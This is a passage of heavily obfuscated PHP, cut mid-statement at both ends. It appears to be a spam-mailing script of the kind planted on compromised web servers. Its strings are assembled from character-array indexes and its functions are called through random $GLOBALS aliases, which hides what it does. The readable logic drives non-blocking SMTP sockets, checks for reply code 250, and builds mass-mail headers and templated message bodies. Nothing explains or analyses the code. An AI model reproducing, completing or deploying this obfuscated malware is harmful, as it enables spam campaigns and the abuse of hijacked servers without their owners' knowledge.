$GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[50].$r76[17].$r76[6].$r76[34]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[50].$r76[17].$r76[6].$r76[34]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 250) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[37].$r76[44].$r76[64].$r76[67].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[44].$r76[64].$r76[67]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); $iwule39[$xhovg5][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = TRUE; $iwule39[$xhovg5][$r76[5].$r76[54].$r76[43].$r76[90].$r76[69]] = 1; } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[44].$r76[64].$r76[67]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, "", FALSE); } break; } } } function rxrmp70($r76, &$iwule39, $xhovg5) { $kdidw81 = 0; $msnsv40 = ""; if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] == FALSE) { if ($GLOBALS['brkww19']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]]) != 0) { return TRUE; } return FALSE; } $jrnqk91 = $GLOBALS['yhcum29']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]], 4086, $kdidw81, $msnsv40); if ($jrnqk91 == FALSE || $jrnqk91 == "") { if ($kdidw81 != 35 && $kdidw81 != 10035 && $kdidw81!= 11 && $kdidw81!= 10060) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $msnsv40, FALSE); return FALSE; } if ($GLOBALS['brkww19']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]]) != 0) { return TRUE; } return FALSE; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = $jrnqk91; return FALSE; } function prcux47($r76, &$iwule39, $xhovg5) { $kdidw81 = 0; $msnsv40 = ""; if ($GLOBALS['brkww19']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]]) == 0) { return TRUE; } $jrnqk91 = $GLOBALS['ibere91']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]], $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]], $kdidw81, $msnsv40); if ($jrnqk91 == FALSE) { if ($kdidw81 != 35 && $kdidw81 != 10035 && $kdidw81 != 11 && $kdidw81 != 10060) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $msnsv40, FALSE); } return FALSE; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]], $jrnqk91); if ($GLOBALS['brkww19']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]]) == 0) { return TRUE; } return FALSE; } function armtx32($r76, &$iwule39) { $bdhch16 = FALSE; if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) != $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])) { foreach($GLOBALS['vszxc90']($iwule39) as $xhovg5) { if ($iwule39[$xhovg5][$r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95]] != TRUE) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = TRUE; $bdhch16 = TRUE; } } return $bdhch16; } $fwcsz21 = array(); foreach($GLOBALS['vszxc90']($iwule39) as $xhovg5) { if ($iwule39[$xhovg5][$r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95]] != TRUE) { if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] == 0 || $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] == $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67])) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = TRUE; } else { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = FALSE; $fwcsz21[]=$iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]]; } $bdhch16 = TRUE; } } if ($GLOBALS['tlyiy12']($fwcsz21) == 0) { return $bdhch16; } $zkvhr54 = @$GLOBALS['qtgcq90']($fwcsz21, $kllzd89 = NULL, $ccvhx50 = NULL, 0); if ($zkvhr54 == FALSE || $zkvhr54 == 0) { return $bdhch16; } foreach($GLOBALS['vszxc90']($iwule39) as $xhovg5) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = FALSE; foreach($fwcsz21 as $xoloh2) { if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] == $xoloh2) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61]] = TRUE; break; } } } return $bdhch16; } function hvcug13($r76, $hcobq94) { if ($GLOBALS['yqqkt30']($r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[24].$r76[94].$r76[90].$r76[87].$r76[94]) && $GLOBALS['yqqkt30']($r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[49].$r76[58].$r76[58].$r76[94].$r76[27].$r76[87]) && $GLOBALS['yqqkt30']($r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[24].$r76[94].$r76[90].$r76[95]) && $GLOBALS['yqqkt30']($r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[43].$r76[24].$r76[53].$r76[87].$r76[94])) { $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])); return TRUE; } if ($GLOBALS['yqqkt30']($r76[7].$r76[66].$r76[49].$r76[27].$r76[29].$r76[49].$r76[41].$r76[94].$r76[58])) { $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[0].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67])); return TRUE; } if ($GLOBALS['yqqkt30']($r76[66].$r76[87].$r76[24].$r76[94].$r76[90].$r76[78].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[5].$r76[53].$r76[94].$r76[58].$r76[87])) { $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[67].$r76[68].$r76[79].$r76[4].$r76[11])); return TRUE; } $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[17])); return FALSE; } function npufi61($r76, $zlyfl67, $jabhi9, &$kumlm43) { $qivuk92 = array(); if (FALSE === @$GLOBALS['cyzbs96']($r76[16].$r76[83].$r76[86].$r76[77].$r76[97].$r76[51].$r76[62].$r76[97].$r76[83].$r76[86].$r76[77].$r76[97].$r76[51].$r76[62].$r76[97].$r76[83].$r76[86].$r76[80].$r76[12].$r76[83].$r76[86].$r76[80].$r76[62].$r76[97].$r76[62].$r76[51].$r76[97].$r76[16], $zlyfl67, $qivuk92) ) { return FALSE; } if (!isset($qivuk92) || $GLOBALS['tlyiy12']($qivuk92) != 5) { return FALSE; } $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]] = @$GLOBALS['bwpvf88']($GLOBALS['bdvxl14']($r76[51],"",$qivuk92[1])); $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87]] = @$GLOBALS['bwpvf88']($GLOBALS['bdvxl14']($r76[51],"",$qivuk92[2])); $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]] = $GLOBALS['bdvxl14']($r76[51],"",$qivuk92[3]); $kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49]] = $GLOBALS['bdvxl14']($r76[51],"",$qivuk92[4]); if (!isset($kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]]) || $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]] == "") { return FALSE; } if (!isset($kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49]]) || $kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49]] == "") { return FALSE; } if (isset($kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]]) && $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]] != "") { $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]] = $r76[92].$kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]].$r76[39].$kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87]].$r76[92].$r76[39].$r76[2].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]].$r76[38]; } else { $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]] = $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]]; } $kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[7].$r76[24].$r76[49].$r76[78]] = $jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]]; if ($GLOBALS['cyzbs96']($r76[16].$r76[65].$r76[83].$r76[1].$r76[76].$r76[26].$r76[15].$r76[9].$r76[8].$r76[1].$r76[76].$r76[26].$r76[15].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[76].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[46].$r76[1].$r76[52].$r76[26].$r76[85].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[46].$r76[28].$r76[1].$r76[52].$r76[26].$r76[28].$r76[9].$r76[62].$r76[83].$r76[42].$r76[86].$r76[83].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[1].$r76[76].$r76[26].$r76[15].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[76].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[46].$r76[1].$r76[52].$r76[26].$r76[85].$r76[9].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[8].$r76[46].$r76[28].$r76[1].$r76[52].$r76[26].$r76[28].$r76[9].$r76[62].$r76[62].$r76[72].$r76[31].$r76[10].$r76[73].$r76[16], $jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]]) || @$GLOBALS['xizmx47']($r76[66].$r76[90].$r76[7].$r76[94].$r76[54].$r76[78].$r76[49].$r76[95].$r76[94])) { $kumlm43[$r76[61].$r76[54].$r76[7].$r76[7].$r76[7]] = FALSE; } else { $kumlm43[$r76[61].$r76[54].$r76[7].$r76[7].$r76[7]] = TRUE; } $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]] = $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[71].$r76[49].$r76[61].$r76[53].$r76[58]].$r76[12].$jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]]; if (isset($jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]]) && $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]] != "") { $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80]] = $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]].$r76[39].$r76[2].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]].$r76[38]; } else { $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80]] = $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]]; } $kumlm43[$r76[66].$r76[54].$r76[78].$r76[20].$r76[36].$r76[49].$r76[66].$r76[87]] = $GLOBALS['stkuy98']($r76, $kumlm43[$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49]]); $kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]] = @$GLOBALS['bdvxl14']($r76[59].$r76[68].$r76[54].$r76[56].$r76[4].$r76[11].$r76[79].$r76[59], $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]], $jabhi9[$r76[66].$r76[45].$r76[96].$r76[47].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]]); $kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]] = @$GLOBALS['bdvxl14']($r76[59].$r76[68].$r76[54].$r76[71].$r76[56].$r76[4].$r76[11].$r76[79].$r76[59], $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87]], $kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]]); $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]] = @$GLOBALS['bdvxl14']($r76[59].$r76[68].$r76[54].$r76[56].$r76[4].$r76[11].$r76[79].$r76[59], $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]], $jabhi9[$r76[96].$r76[49].$r76[95].$r76[69].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]]); $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]] = @$GLOBALS['bdvxl14']($r76[59].$r76[68].$r76[54].$r76[71].$r76[56].$r76[4].$r76[11].$r76[79].$r76[59], $kumlm43[$r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87]], $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]]); $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]] = @$GLOBALS['bdvxl14']($r76[59].$r76[11].$r76[4].$r76[64].$r76[71].$r76[54].$r76[79].$r76[56].$r76[59], $GLOBALS['igajs32']($r76, $kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]]), $kumlm43[$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]]); $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] = $r76[32].$r76[26].$r76[3].$r76[24].$r76[53].$r76[49].$r76[24].$r76[53].$r76[87].$r76[69].$r76[74].$r76[39].$r76[31].$r76[39].$r76[83].$r76[56].$r76[49].$r76[24].$r76[78].$r76[90].$r76[5].$r76[62].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[11].$r76[64].$r76[11].$r76[79].$r76[26].$r76[60].$r76[94].$r76[24].$r76[66].$r76[53].$r76[49].$r76[58].$r76[74].$r76[39].$r76[76].$r76[86].$r76[52].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[40].$r76[49].$r76[58].$r76[87].$r76[94].$r76[58].$r76[87].$r76[26].$r76[67].$r76[69].$r76[41].$r76[94].$r76[74].$r76[39].$r76[87].$r76[94].$r76[20].$r76[87].$r76[16].$r76[36].$r76[87].$r76[78].$r76[5].$r76[51].$r76[39].$r76[27].$r76[36].$r76[90].$r76[24].$r76[66].$r76[94].$r76[87].$r76[75].$r76[92].$r76[53].$r76[66].$r76[49].$r76[26].$r76[18].$r76[18].$r76[28].$r76[15].$r76[26].$r76[76].$r76[92].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[40].$r76[49].$r76[58].$r76[87].$r76[94].$r76[58].$r76[87].$r76[26].$r76[67].$r76[24].$r76[90].$r76[58].$r76[66].$r76[7].$r76[94].$r76[24].$r76[26].$r76[79].$r76[58].$r76[27].$r76[49].$r76[95].$r76[53].$r76[58].$r76[61].$r76[74].$r76[39].$r76[18].$r76[96].$r76[53].$r76[87].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78]] = $r76[0].$r76[24].$r76[49].$r76[78].$r76[74].$r76[39].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80]].$r76[21].$r76[30]; $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78]] .= $r76[68].$r76[94].$r76[41].$r76[5].$r76[69].$r76[26].$r76[67].$r76[49].$r76[74].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80]].$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] = $r76[6].$r76[90].$r76[87].$r76[94].$r76[74].$r76[39] . @$GLOBALS['duiid33']($r76[6].$r76[33].$r76[39].$r76[47].$r76[39].$r76[11].$r76[39].$r76[34].$r76[39].$r76[48].$r76[74].$r76[53].$r76[74].$r76[66].$r76[39].$r76[17]).$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $kumlm43[$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78]]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[11].$r76[94].$r76[66].$r76[66].$r76[90].$r76[61].$r76[94].$r76[26].$r76[64].$r76[6].$r76[74].$r76[39].$r76[2].$GLOBALS['laepm94']($r76[16].$r76[83].$r76[86].$r76[72].$r76[14].$r76[10].$r76[62].$r76[83].$r76[86].$r76[72].$r76[28].$r76[10].$r76[62].$r76[83].$r76[86].$r76[72].$r76[46].$r76[10].$r76[62].$r76[86].$r76[77].$r76[16], $r76[73].$r76[76].$r76[26].$r76[73].$r76[46].$r76[26].$r76[73].$r76[31], $GLOBALS['quzii24']($GLOBALS['kyioa8']())).$r76[12].$jabhi9[$r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78]].$r76[38].$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[67].$r76[49].$r76[74].$r76[39].$kumlm43[$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]].$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $r76[55].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87].$r76[74].$r76[39].$kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]].$r76[21].$r76[30]; $kumlm43[$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]] .= $kumlm43[$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]]; return TRUE; } function vkaqq98($r76, $pfahk9) { $mlopr36 = array(); $vcnaa29 = array(); if ($GLOBALS['yqqkt30']($r76[61].$r76[94].$r76[87].$r76[78].$r76[20].$r76[24].$r76[24])) { @$GLOBALS['grxdw62']($pfahk9, $mlopr36, $vcnaa29); } else { if ($GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79]) == $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[17])) { return FALSE; } $zkvhr54 = $GLOBALS['nvuxa92']($r76, $pfahk9, $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[11].$r76[32])); if ($zkvhr54 == FALSE || !isset($zkvhr54[$r76[90].$r76[58].$r76[66]])) { return FALSE; } foreach ($zkvhr54[$r76[90].$r76[58].$r76[66]] as $txows40) { if ($txows40[$r76[87].$r76[69].$r76[41].$r76[94]] == $GLOBALS['glyac65']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[11].$r76[32])) { $mlopr36[] = $txows40[$r76[95].$r76[90].$r76[87].$r76[90]]; $vcnaa29[] = $txows40[$r76[41].$r76[24].$r76[94].$r76[7].$r76[94].$r76[24].$r76[94].$r76[58].$r76[27].$r76[94]]; } } } if ($GLOBALS['tlyiy12']($mlopr36) == 0) { return FALSE; } $wtqra76 = $GLOBALS['vszxc90']($vcnaa29, $GLOBALS['ysmvf63']($vcnaa29)); return $mlopr36[$wtqra76[0]]; } function xyhxn92($r76, &$jabhi9) { if ($GLOBALS['tlyiy12']($GLOBALS['vbhwy58']) < 2) { return FALSE; } $binbe57 = false; $xzovr93 = $ufhgw71 = ""; foreach ($GLOBALS['vszxc90']($GLOBALS['vbhwy58']) as $clhez9) { if ($clhez9[0] == $r76[5]) { $xzovr93 = $clhez9; } if ($clhez9[0] == $r76[95]) { $ufhgw71 = $clhez9; } if ($clhez9[0] == $r76[94]) { $binbe57 = true; } } if ($xzovr93 == "" || $ufhgw71 == "") { return FALSE; } $kuaid89 = $GLOBALS['wdbfr89']($r76, $xzovr93, $binbe57 ); $mkfpj46= $GLOBALS['wdbfr89']($r76, $ufhgw71, $binbe57); if ($kuaid89 == FALSE || $mkfpj46 == FALSE) { return FALSE; } $jabhi9[$r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87]] = @$GLOBALS['vxogc32']($r76[16].$r76[93].$r76[16], $kuaid89); $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[71].$r76[49].$r76[61].$r76[53].$r76[58]] = $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]] = $jabhi9[$r76[66].$r76[45].$r76[96].$r76[47].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]] = $jabhi9[$r76[96].$r76[49].$r76[95].$r76[69].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]] = ""; $qivuk92 = array(); if (FALSE !== @$GLOBALS['cyzbs96']($r76[16].$r76[2].$r76[44].$r76[55].$r76[79].$r76[68].$r76[38].$r76[83].$r76[86].$r76[77].$r76[97].$r76[62].$r76[2].$r76[42].$r76[16].$r76[44].$r76[55].$r76[79].$r76[68].$r76[38].$r76[16].$r76[53].$r76[66].$r76[78], $mkfpj46, $qivuk92) && isset($qivuk92) && $GLOBALS['tlyiy12']($qivuk92) > 1) { $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[71].$r76[49].$r76[61].$r76[53].$r76[58]] = $qivuk92[1]; } if (FALSE !== @$GLOBALS['cyzbs96']($r76[16].$r76[2].$r76[56].$r76[4].$r76[11].$r76[79].$r76[38].$r76[83].$r76[86].$r76[77].$r76[97].$r76[62].$r76[2].$r76[42].$r76[16].$r76[56].$r76[4].$r76[11].$r76[79].$r76[38].$r76[16].$r76[53].$r76[66].$r76[78], $mkfpj46, $qivuk92) && isset($qivuk92) && $GLOBALS['tlyiy12']($qivuk92) > 1) { $jabhi9[$r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94]] = $qivuk92[1]; } if (FALSE !== @$GLOBALS['cyzbs96']($r76[16].$r76[2].$r76[55].$r76[44].$r76[50].$r76[81].$r76[38].$r76[83].$r76[86].$r76[77].$r76[97].$r76[62].$r76[2].$r76[42].$r76[16].$r76[55].$r76[44].$r76[50].$r76[81].$r76[38].$r76[16].$r76[53].$r76[66].$r76[78], $mkfpj46, $qivuk92) && isset($qivuk92) && $GLOBALS['tlyiy12']($qivuk92) > 1) { $jabhi9[$r76[66].$r76[45].$r76[96].$r76[47].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5]] = $qivuk92[1]; } if (FALSE !== 